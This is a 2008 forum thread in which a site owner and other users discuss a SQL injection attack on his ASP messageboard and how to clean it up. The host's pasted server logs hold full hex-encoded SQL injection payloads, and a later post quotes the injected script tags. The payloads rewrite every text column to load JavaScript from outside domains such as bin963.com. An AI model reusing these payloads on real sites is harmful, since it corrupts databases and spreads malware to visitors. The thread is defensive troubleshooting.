| T O P I C R E V I E W |
| richfed |
Posted - 28 June 2008 : 07:10:41
At least according to my web host:
We have scanned your site for vulnerability and found the following pages which are vulnerable..
/messageboard/avatar_legend.asp
/messageboard/guestbook.asp
/messageboard/myowngoogle.asp
/messageboard/Photo_Album_view.asp
/messageboard/pop_report.asp
Hope that may help some of you out there.
PS - Not sure where the best place is to post this. Move as appropriate!!< |
| 13 L A T E S T R E P L I E S (Newest First) |
| ruirib |
Posted - 28 June 2008 : 15:47:55
You're welcome.< |
| richfed |
Posted - 28 June 2008 : 15:42:24
Got it removed, finally. You da man, ruirib!! Thanks ...< |
| ruirib |
Posted - 28 June 2008 : 14:51:47
Seems like they used several links. You will need to run the script once for each link, of course, changing the link in the script.< |
| richfed |
Posted - 28 June 2008 : 14:27:40
Yes, I had inserted that before I sent it to them. They ran it; said 8 rows were infected. I still see the script - <script src=http://www.rid34.com/b.js></script><script src=http://www.app52.com/b.js></script><script src=http://www.app52.com/b.js></script><script src=http://www.bin963.com/b.js></script> - in the field Title Image Location in the Main Forum Config area. How in the world can I get that out????? I remove it, it just pops back in.  < |
| ruirib |
Posted - 28 June 2008 : 12:14:18
Do let them know that they will need to replace for the actual "infectious" link in the script, otherwise it won't have any effect.< |
| richfed |
Posted - 28 June 2008 : 12:06:56
Done, ruirib. I just contacted my host once again about running that script. Thanks -< |
| ruirib |
Posted - 28 June 2008 : 11:14:48
Rich, you need to fix your forum database, anyone who visits your forum is at get risk of getting virus infected. It's amazing that after a couple days your host hasn't addressed this. The script I posted fixes all of it in a few seconds!
Please take the forum down until is fixed. If someone unprotected visits your forum, they are at risk, and you will have some responsability in that, too.< |
| ruirib |
Posted - 28 June 2008 : 11:10:07
That was just a hack attempt. Topic.asp is secure and it has been for as long as I can remember!< |
| richfed |
Posted - 28 June 2008 : 10:00:19
quote:
Originally posted by leatherlips
What makes them vulnerable and how can they be fixed? I use the guestbook mod and would like to be sure it is secure.
I wish I could answer that! I'm hoping someone can ...
Meanwhile, my host sent this:
We can see few SQL injetion attempts in the logs through the asp script topic.asp
GET /messageboard/topic.asp
topic_ID=4557;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST
(0x4445434C415245204054205641524348415228323535292C404320564152434841
522832353529204445434C415245205461626C655F437572736F7220435552534F522
0464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F
626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622
E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939
204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622
E78747970653D31363729204F50454E205461626C655F437572736F72204645544348
204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C40432
05748494C4528404046455443485F5354415455533D302920424547494E2045584543
2827555044415445205B272B40542B275D20534554205B272B40432B275D3D5254524
94D28434F4E5645525428564152434841522834303030292C5B272B40432B275D2929
2B27273C736372697074207372633D687474703A2F2F7777772E62696E3936332E636
F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E455854204652
4F4D205461626C655F437572736F7220494E5
44F2040542C404320454E4420434C4F5345205461626C655F437572736F7220444541
4C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC
(@S);--
80 - 58.187.50.43 HTTP/1.1
Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) -
- www.mohicanpress.com
GET /messageboard/topic.asp
whichpage=-1&TOPIC_ID=5180&REPLY_ID=37246;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST
(0x4445434C415245204054205641524348415228323535292C404320564152434841
522832353529204445434C415245205461626C655F437572736F7220435552534F522
0464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F
626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D62
E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939
204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622
E78747970653D31363729204F50454E205461626C655F437572736F72204645544348
204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C40432
05748494C4528404046455443485F5354415455533D302920424547494E2045584543
2827555044415445205B272B40542B275D20534554205B272B40432B275D3D5254524
94D28434F4E5645525428564152434841522834303030292C5B272B40432B275D2929
2B27273C736372697074207372633D687474703A2F2F7777772E61737073736C36332
E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E45585420
4
6524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C
4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F4
37572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--
80 - 200.90.76.104
GET /messageboard/topic.asp
TOPIC_ID=4035;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST
(0x4445434C415245204054205641524348415228323535292C404320564152434841
522832353529204445434C415245205461626C655F437572736F7220435552534F522
0464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F
626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622
E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939
204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622
E78747970653D31363729204F50454E205461626C655F437572736F72204645544348
204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C40432
05748494C4528404046455443485F5354415455533D302920424547494E2045584543
2827555044415445205B272B40542B275D20534554205B272B40432B275D3D5254524
94D28434F4E5645525428564152434841522834303030292C5B272B40432B275D2929
2B27273C736372697074207372633D687474703A2F2F7777772E6170707338342E636
F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E455854204652
4F4D205461626C655F437572736F7220494E5
44F2040542C404320454E4420434C4F5345205461626C655F437572736F7220444541
4C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC
(@S);--
80 - 190.39.125.85 HTTP/1.1
Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) -
- www.mohicanpress.com
These are found in the logs just before the first entry of the given pattern
The sql statements are encoded to Hexadecimal code ( start from: SET%20@S=CAST( . You can try to decode it using any online tools which converts Hexadecimal to string ).
If someone could make English out of this, there areprobably a few here who would be most grateful!!
< |
| SiSL |
Posted - 28 June 2008 : 09:01:20
There is some SQL Injection checkers for hosts, that might be possible checking queryies...< |
| HuwR |
Posted - 28 June 2008 : 08:52:31
I would be interested in why your host thinks all those files are vunerable, I have seen the results of automated vulnerability checkers, and they were quite frankly completely useless.
If they have manually scanned your logs after an attack, then it is extremely unlikely that more than one file was used for an attack, and is generally the last file accessed by the hacker, but there may be several attempts on various files prior to the actual succesful attempt.
obviously if they have some better evidence then fair enough< |
| modifichicci |
Posted - 28 June 2008 : 08:08:24
I think in Photo_album_view we have to sanitize these variables:
strPhotoName = trim(request.QueryString("PhotoName"))
strDescription = trim(request.QueryString("Description"))
strPhotoSearch = trim(request.QueryString("Photo_Search"))
I think the first two are numeric, so the general fix for numeric could be useful, but the last is a string, so i don't know if a sqlstring it's enought or not.
There is a validate input function in inc photo functions but at this moment I don't know how to use it..< |
| leatherlips |
Posted - 28 June 2008 : 07:29:08
What makes them vulnerable and how can they be fixed? I use the guestbook mod and would like to be sure it is secure.< |
